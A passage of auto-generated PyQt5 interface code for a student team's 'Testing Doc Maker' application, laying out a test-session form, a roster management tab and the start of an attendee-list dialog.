self.layout_loc)\n self.date_session = QtWidgets.QDateEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.date_session.sizePolicy().hasHeightForWidth())\n self.date_session.setSizePolicy(sizePolicy)\n self.date_session.setCalendarPopup(True)\n self.date_session.setDate(QtCore.QDate(2019, 1, 31))\n self.date_session.setObjectName(\"date_session\")\n self.form_left_general.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.date_session)\n self.horizontalLayout_3.addLayout(self.form_left_general)\n self.form_right_general = QtWidgets.QFormLayout()\n self.form_right_general.setContentsMargins(-1, 5, -1, -1)\n self.form_right_general.setObjectName(\"form_right_general\")\n self.label_part = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_part.sizePolicy().hasHeightForWidth())\n self.label_part.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_part.setFont(font)\n self.label_part.setObjectName(\"label_part\")\n self.form_right_general.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_part)\n self.edit_part = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_part.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_part.sizePolicy().hasHeightForWidth())\n self.edit_part.setSizePolicy(sizePolicy)\n self.edit_part.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_part.setClearButtonEnabled(True)\n self.edit_part.setObjectName(\"edit_part\")\n self.form_right_general.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_part)\n self.label_cat = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_cat.sizePolicy().hasHeightForWidth())\n self.label_cat.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_cat.setFont(font)\n self.label_cat.setObjectName(\"label_cat\")\n self.form_right_general.setWidget(1, 
QtWidgets.QFormLayout.LabelRole, self.label_cat)\n self.edit_cat = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_cat.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_cat.sizePolicy().hasHeightForWidth())\n self.edit_cat.setSizePolicy(sizePolicy)\n self.edit_cat.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_cat.setClearButtonEnabled(True)\n self.edit_cat.setObjectName(\"edit_cat\")\n self.form_right_general.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_cat)\n self.label_doc_num = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_doc_num.sizePolicy().hasHeightForWidth())\n self.label_doc_num.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_doc_num.setFont(font)\n self.label_doc_num.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_doc_num.setObjectName(\"label_doc_num\")\n self.form_right_general.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_doc_num)\n self.layout_doc_num = QtWidgets.QVBoxLayout()\n self.layout_doc_num.setObjectName(\"layout_doc_num\")\n self.edit_doc_num = QtWidgets.QLineEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_doc_num.sizePolicy().hasHeightForWidth())\n self.edit_doc_num.setSizePolicy(sizePolicy)\n self.edit_doc_num.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_doc_num.setClearButtonEnabled(True)\n self.edit_doc_num.setObjectName(\"edit_doc_num\")\n self.layout_doc_num.addWidget(self.edit_doc_num)\n self.btn_get_num = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_get_num.sizePolicy().hasHeightForWidth())\n self.btn_get_num.setSizePolicy(sizePolicy)\n self.btn_get_num.setObjectName(\"btn_get_num\")\n self.layout_doc_num.addWidget(self.btn_get_num)\n self.form_right_general.setLayout(2, QtWidgets.QFormLayout.FieldRole, self.layout_doc_num)\n self.label_desc = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_desc.sizePolicy().hasHeightForWidth())\n self.label_desc.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_desc.setFont(font)\n self.label_desc.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_desc.setObjectName(\"label_desc\")\n self.form_right_general.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_desc)\n self.edit_desc = QtWidgets.QTextEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_desc.sizePolicy().hasHeightForWidth())\n 
self.edit_desc.setSizePolicy(sizePolicy)\n self.edit_desc.setMaximumSize(QtCore.QSize(135, 300))\n self.edit_desc.setObjectName(\"edit_desc\")\n self.form_right_general.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.edit_desc)\n self.btn_submit_form = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_submit_form.sizePolicy().hasHeightForWidth())\n self.btn_submit_form.setSizePolicy(sizePolicy)\n self.btn_submit_form.setObjectName(\"btn_submit_form\")\n self.form_right_general.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.btn_submit_form)\n spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.form_right_general.setItem(4, QtWidgets.QFormLayout.FieldRole, spacerItem2)\n self.btn_export = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_export.sizePolicy().hasHeightForWidth())\n self.btn_export.setSizePolicy(sizePolicy)\n self.btn_export.setObjectName(\"btn_export\")\n self.form_right_general.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.btn_export)\n self.horizontalLayout_3.addLayout(self.form_right_general)\n self.gridLayout_3.addWidget(self.fr_general_info, 3, 0, 1, 1)\n self.btn_import = QtWidgets.QPushButton(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_import.sizePolicy().hasHeightForWidth())\n self.btn_import.setSizePolicy(sizePolicy)\n self.btn_import.setObjectName(\"btn_import\")\n self.gridLayout_3.addWidget(self.btn_import, 2, 0, 1, 1)\n self.scroll_fields.setWidget(self.scroll_fields_contents)\n self.gridlayout.addWidget(self.scroll_fields, 3, 0, 1, 1)\n self.layout_document_settings = QtWidgets.QFormLayout()\n self.layout_document_settings.setObjectName(\"layout_document_settings\")\n self.btn_open_template = QtWidgets.QPushButton(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_open_template.sizePolicy().hasHeightForWidth())\n self.btn_open_template.setSizePolicy(sizePolicy)\n self.btn_open_template.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_open_template.setObjectName(\"btn_open_template\")\n self.layout_document_settings.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.btn_open_template)\n self.file_path = QtWidgets.QLabel(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.file_path.sizePolicy().hasHeightForWidth())\n self.file_path.setSizePolicy(sizePolicy)\n self.file_path.setObjectName(\"file_path\")\n self.layout_document_settings.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.file_path)\n self.btn_save_doc = QtWidgets.QPushButton(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n 
sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_save_doc.sizePolicy().hasHeightForWidth())\n self.btn_save_doc.setSizePolicy(sizePolicy)\n self.btn_save_doc.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_save_doc.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_save_doc.setObjectName(\"btn_save_doc\")\n self.layout_document_settings.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.btn_save_doc)\n self.label_save_doc = QtWidgets.QLabel(self.tab_main)\n self.label_save_doc.setEnabled(True)\n self.label_save_doc.setObjectName(\"label_save_doc\")\n self.layout_document_settings.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.label_save_doc)\n self.gridlayout.addLayout(self.layout_document_settings, 1, 0, 1, 1)\n self.main_tabs.addTab(self.tab_main, \"\")\n self.tab_roster = QtWidgets.QWidget()\n self.tab_roster.setObjectName(\"tab_roster\")\n self.gridLayout_2 = QtWidgets.QGridLayout(self.tab_roster)\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.formLayout = QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.btn_open_roster = QtWidgets.QPushButton(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_open_roster.sizePolicy().hasHeightForWidth())\n self.btn_open_roster.setSizePolicy(sizePolicy)\n self.btn_open_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_open_roster.setObjectName(\"btn_open_roster\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.btn_open_roster)\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.btn_close_roster = QtWidgets.QPushButton(self.tab_roster)\n self.btn_close_roster.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_close_roster.sizePolicy().hasHeightForWidth())\n self.btn_close_roster.setSizePolicy(sizePolicy)\n self.btn_close_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_close_roster.setObjectName(\"btn_close_roster\")\n self.horizontalLayout_4.addWidget(self.btn_close_roster)\n self.btn_save_roster = QtWidgets.QPushButton(self.tab_roster)\n self.btn_save_roster.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_save_roster.sizePolicy().hasHeightForWidth())\n self.btn_save_roster.setSizePolicy(sizePolicy)\n self.btn_save_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_save_roster.setObjectName(\"btn_save_roster\")\n self.horizontalLayout_4.addWidget(self.btn_save_roster)\n self.label_roster = QtWidgets.QLabel(self.tab_roster)\n self.label_roster.setObjectName(\"label_roster\")\n self.horizontalLayout_4.addWidget(self.label_roster)\n self.formLayout.setLayout(0, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n self.btn_create_roster = QtWidgets.QPushButton(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n 
sizePolicy.setHeightForWidth(self.btn_create_roster.sizePolicy().hasHeightForWidth())\n self.btn_create_roster.setSizePolicy(sizePolicy)\n self.btn_create_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_create_roster.setObjectName(\"btn_create_roster\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.btn_create_roster)\n self.label_create_roster = QtWidgets.QLabel(self.tab_roster)\n self.label_create_roster.setObjectName(\"label_create_roster\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.label_create_roster)\n self.gridLayout_2.addLayout(self.formLayout, 0, 0, 1, 1)\n self.tree_roster = QtWidgets.QTreeWidget(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.tree_roster.sizePolicy().hasHeightForWidth())\n self.tree_roster.setSizePolicy(sizePolicy)\n self.tree_roster.setMinimumSize(QtCore.QSize(0, 0))\n self.tree_roster.setAlternatingRowColors(True)\n self.tree_roster.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n self.tree_roster.setObjectName(\"tree_roster\")\n self.tree_roster.headerItem().setTextAlignment(0, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(1, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(2, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(3, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(4, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(5, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(6, QtCore.Qt.AlignCenter)\n self.tree_roster.header().setCascadingSectionResizes(True)\n self.tree_roster.header().setDefaultSectionSize(90)\n self.tree_roster.header().setHighlightSections(False)\n self.gridLayout_2.addWidget(self.tree_roster, 1, 0, 1, 1)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.btn_add_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_add_member.setEnabled(False)\n self.btn_add_member.setObjectName(\"btn_add_member\")\n self.horizontalLayout.addWidget(self.btn_add_member)\n self.btn_modify_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_modify_member.setEnabled(False)\n self.btn_modify_member.setObjectName(\"btn_modify_member\")\n self.horizontalLayout.addWidget(self.btn_modify_member)\n self.btn_remove_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_remove_member.setEnabled(False)\n self.btn_remove_member.setObjectName(\"btn_remove_member\")\n self.horizontalLayout.addWidget(self.btn_remove_member)\n self.gridLayout_2.addLayout(self.horizontalLayout, 2, 0, 1, 1)\n self.main_tabs.addTab(self.tab_roster, \"\")\n self.gridLayout.addWidget(self.main_tabs, 0, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 690, 21))\n self.menubar.setObjectName(\"menubar\")\n self.menuFile = QtWidgets.QMenu(self.menubar)\n self.menuFile.setObjectName(\"menuFile\")\n MainWindow.setMenuBar(self.menubar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n self.actionOpen_Template_File = QtWidgets.QAction(MainWindow)\n self.actionOpen_Template_File.setObjectName(\"actionOpen_Template_File\")\n 
self.actionSave_Testing_Doc = QtWidgets.QAction(MainWindow)\n self.actionSave_Testing_Doc.setObjectName(\"actionSave_Testing_Doc\")\n self.menuFile.addAction(self.actionOpen_Template_File)\n self.menuFile.addAction(self.actionSave_Testing_Doc)\n self.menubar.addAction(self.menuFile.menuAction())\n\n self.retranslateUi(MainWindow)\n self.main_tabs.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n MainWindow.setTabOrder(self.edit_requestor, self.edit_lead)\n MainWindow.setTabOrder(self.edit_lead, self.btn_modify_attending)\n MainWindow.setTabOrder(self.btn_modify_attending, self.date_session)\n MainWindow.setTabOrder(self.date_session, self.time_start)\n MainWindow.setTabOrder(self.time_start, self.time_end)\n MainWindow.setTabOrder(self.time_end, self.radio_dyno)\n MainWindow.setTabOrder(self.radio_dyno, self.radio_track)\n MainWindow.setTabOrder(self.radio_track, self.radio_type_other)\n MainWindow.setTabOrder(self.radio_type_other, self.edit_type_other)\n MainWindow.setTabOrder(self.edit_type_other, self.radio_loc_cage)\n MainWindow.setTabOrder(self.radio_loc_cage, self.radio_loc_loading)\n MainWindow.setTabOrder(self.radio_loc_loading, self.radio_loc_casino)\n MainWindow.setTabOrder(self.radio_loc_casino, self.radio_loc_other)\n MainWindow.setTabOrder(self.radio_loc_other, self.edit_loc_other)\n MainWindow.setTabOrder(self.edit_loc_other, self.edit_part)\n MainWindow.setTabOrder(self.edit_part, self.edit_cat)\n MainWindow.setTabOrder(self.edit_cat, self.edit_doc_num)\n MainWindow.setTabOrder(self.edit_doc_num, self.btn_get_num)\n MainWindow.setTabOrder(self.btn_get_num, self.edit_desc)\n MainWindow.setTabOrder(self.edit_desc, self.btn_export)\n MainWindow.setTabOrder(self.btn_export, self.btn_submit_form)\n MainWindow.setTabOrder(self.btn_submit_form, self.main_tabs)\n MainWindow.setTabOrder(self.main_tabs, self.scroll_fields)\n MainWindow.setTabOrder(self.scroll_fields, self.btn_import)\n MainWindow.setTabOrder(self.btn_import, self.btn_open_template)\n MainWindow.setTabOrder(self.btn_open_template, self.btn_save_doc)\n MainWindow.setTabOrder(self.btn_save_doc, self.btn_open_roster)\n MainWindow.setTabOrder(self.btn_open_roster, self.btn_close_roster)\n MainWindow.setTabOrder(self.btn_close_roster, self.btn_save_roster)\n MainWindow.setTabOrder(self.btn_save_roster, self.btn_create_roster)\n MainWindow.setTabOrder(self.btn_create_roster, self.tree_roster)\n MainWindow.setTabOrder(self.tree_roster, self.btn_add_member)\n MainWindow.setTabOrder(self.btn_add_member, self.btn_modify_member)\n MainWindow.setTabOrder(self.btn_modify_member, self.btn_remove_member)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Testing Doc Maker\"))\n self.label_general.setText(_translate(\"MainWindow\", \"General Info\"))\n self.label_requestor.setText(_translate(\"MainWindow\", \"Name of requestor:\"))\n self.label_lead.setText(_translate(\"MainWindow\", \"Test Lead:\"))\n self.label_attendee.setText(_translate(\"MainWindow\", \"Attendee List:\"))\n self.btn_modify_attending.setText(_translate(\"MainWindow\", \"Modify List\"))\n self.label_session_date.setText(_translate(\"MainWindow\", \"Test Session Date:\"))\n self.label_session_st.setText(_translate(\"MainWindow\", \"Start Time:\"))\n self.label_session_et.setText(_translate(\"MainWindow\", \"End Time:\"))\n self.label_testing_type.setText(_translate(\"MainWindow\", \"Testing Type:\"))\n 
self.radio_dyno.setText(_translate(\"MainWindow\", \"Dyno\"))\n self.radio_track.setText(_translate(\"MainWindow\", \"Track\"))\n self.edit_type_other.setPlaceholderText(_translate(\"MainWindow\", \"Other\"))\n self.label_session_loc.setText(_translate(\"MainWindow\", \"Testing Location:\"))\n self.radio_loc_cage.setText(_translate(\"MainWindow\", \"Cage\"))\n self.radio_loc_loading.setText(_translate(\"MainWindow\", \"Loading Dock\"))\n self.radio_loc_casino.setText(_translate(\"MainWindow\", \"Casino\"))\n self.edit_loc_other.setPlaceholderText(_translate(\"MainWindow\", \"Other\"))\n self.date_session.setDisplayFormat(_translate(\"MainWindow\", \"yyyy-dd-MM\"))\n self.label_part.setText(_translate(\"MainWindow\", \"Part Being Tested:\"))\n self.edit_part.setPlaceholderText(_translate(\"MainWindow\", \"CFR19\"))\n self.label_cat.setText(_translate(\"MainWindow\", \"Testing Category\"))\n self.edit_cat.setPlaceholderText(_translate(\"MainWindow\", \"Testing\"))\n self.label_doc_num.setText(_translate(\"MainWindow\", \"Testing Doc Number:\"))\n self.edit_doc_num.setPlaceholderText(_translate(\"MainWindow\", \"10997\"))\n self.btn_get_num.setText(_translate(\"MainWindow\", \"Autofill Number\"))\n self.label_desc.setText(_translate(\"MainWindow\", \"Description:\"))\n self.edit_desc.setPlaceholderText(_translate(\"MainWindow\", \"Testing\"))\n self.btn_submit_form.setText(_translate(\"MainWindow\", \"Submit Form\"))\n self.btn_export.setText(_translate(\"MainWindow\", \"Export As Template\"))\n self.btn_import.setText(_translate(\"MainWindow\", \"Import Template\"))\n self.btn_open_template.setText(_translate(\"MainWindow\", \"Choose Template File\"))\n self.file_path.setText(_translate(\"MainWindow\", \"No document chosen.\"))\n self.btn_save_doc.setText(_translate(\"MainWindow\", \"Save Testing Doc\"))\n self.label_save_doc.setText(_translate(\"MainWindow\", \"Document not saved.\"))\n self.main_tabs.setTabText(self.main_tabs.indexOf(self.tab_main), _translate(\"MainWindow\", \"Main Page\"))\n self.btn_open_roster.setText(_translate(\"MainWindow\", \"Choose Roster File\"))\n self.btn_close_roster.setText(_translate(\"MainWindow\", \"Close Roster File\"))\n self.btn_save_roster.setText(_translate(\"MainWindow\", \"Save Roster File\"))\n self.label_roster.setText(_translate(\"MainWindow\", \"No roster file chosen.\"))\n self.btn_create_roster.setText(_translate(\"MainWindow\", \"Create Roster File\"))\n self.label_create_roster.setText(_translate(\"MainWindow\", \"Roster File not created.\"))\n self.tree_roster.setSortingEnabled(True)\n self.tree_roster.headerItem().setText(0, _translate(\"MainWindow\", \"Member ID\"))\n self.tree_roster.headerItem().setText(1, _translate(\"MainWindow\", \"First Name\"))\n self.tree_roster.headerItem().setText(2, _translate(\"MainWindow\", \"Last Name\"))\n self.tree_roster.headerItem().setText(3, _translate(\"MainWindow\", \"Cell #\"))\n self.tree_roster.headerItem().setText(4, _translate(\"MainWindow\", \"Waiver Signed\"))\n self.tree_roster.headerItem().setText(5, _translate(\"MainWindow\", \"Truck Cert\"))\n self.tree_roster.headerItem().setText(6, _translate(\"MainWindow\", \"Trailer Cert\"))\n self.btn_add_member.setText(_translate(\"MainWindow\", \"Add Member\"))\n self.btn_modify_member.setText(_translate(\"MainWindow\", \"Modify Member\"))\n self.btn_remove_member.setText(_translate(\"MainWindow\", \"Remove Member(s)\"))\n self.main_tabs.setTabText(self.main_tabs.indexOf(self.tab_roster), _translate(\"MainWindow\", \"Roster Management\"))\n 
self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\n self.actionOpen_Template_File.setText(_translate(\"MainWindow\", \"Open Template File\"))\n self.actionOpen_Template_File.setShortcut(_translate(\"MainWindow\", \"Ctrl+O\"))\n self.actionSave_Testing_Doc.setText(_translate(\"MainWindow\", \"Save Testing Doc\"))\n self.actionSave_Testing_Doc.setShortcut(_translate(\"MainWindow\", \"Ctrl+S\"))\n\n" }, { "alpha_fraction": 0.6995456218719482, "alphanum_fraction": 0.7199923992156982, "avg_line_length": 57.67777633666992, "blob_id": "e2d0f5d3b70102806ddbd54c5cadc118505733af", "content_id": "aceb711bce3af986cc23c9a13909d1277b192792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5282, "license_type": "no_license", "max_line_length": 114, "num_lines": 90, "path": "/windows/attendee.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\windows\\attendee_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_attendee_list(object):\n def setupUi(self, attendee_list):\n attendee_list.setObjectName(\"attendee_list\")\n attendee_list.resize(648, 314)\n attendee_list.setMinimumSize(QtCore.QSize(648, 314))\n attendee_list.setMaximumSize(QtCore.QSize(1107, 314))\n attendee_list.setSizeGripEnabled(True)\n self.gridLayout = QtWidgets.QGridLayout(attendee_list)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.tree_attendee = QtWidgets.QTreeWidget(attendee_list)\n self.tree_attendee.setMinimumSize(QtCore.QSize(510, 238))\n self.tree_attendee.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)\n self.tree_attendee.setEditTriggers(QtWidgets.QAbstractItemView.EditKeyPressed)\n self.tree_attendee.setAlternatingRowColors(True)\n self.tree_attendee.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n self.tree_attendee.setUniformRowHeights(False)\n self.tree_attendee.setHeaderHidden(False)\n self.tree_attendee.setObjectName(\"tree_attendee\")\n self.tree_attendee.header().setCascadingSectionResizes(True)\n self.tree_attendee.header().setHighlightSections(False)\n self.gridLayout.addWidget(self.tree_attendee, 1, 0, 1, 1)\n self.label_attendee_list = QtWidgets.QLabel(attendee_list)\n font = QtGui.QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_attendee_list.setFont(font)\n self.label_attendee_list.setObjectName(\"label_attendee_list\")\n self.gridLayout.addWidget(self.label_attendee_list, 0, 0, 1, 1)\n self.verticalLayout = QtWidgets.QVBoxLayout()\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.btn_modify_member = QtWidgets.QPushButton(attendee_list)\n self.btn_modify_member.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_modify_member.setObjectName(\"btn_modify_member\")\n self.verticalLayout.addWidget(self.btn_modify_member)\n self.btn_add_member = QtWidgets.QPushButton(attendee_list)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_add_member.sizePolicy().hasHeightForWidth())\n self.btn_add_member.setSizePolicy(sizePolicy)\n self.btn_add_member.setMinimumSize(QtCore.QSize(110, 23))\n self.btn_add_member.setMaximumSize(QtCore.QSize(110, 16777215))\n 
self.btn_add_member.setObjectName(\"btn_add_member\")\n self.verticalLayout.addWidget(self.btn_add_member)\n self.btn_remove_member = QtWidgets.QPushButton(attendee_list)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_remove_member.sizePolicy().hasHeightForWidth())\n self.btn_remove_member.setSizePolicy(sizePolicy)\n self.btn_remove_member.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_remove_member.setObjectName(\"btn_remove_member\")\n self.verticalLayout.addWidget(self.btn_remove_member)\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem)\n self.gridLayout.addLayout(self.verticalLayout, 1, 1, 1, 1)\n self.buttonBox = QtWidgets.QDialogButtonBox(attendee_list)\n self.buttonBox.setMaximumSize(QtCore.QSize(114, 23))\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Save)\n self.buttonBox.setCenterButtons(False)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.gridLayout.addWidget(self.buttonBox, 2, 1, 1, 1)\n\n 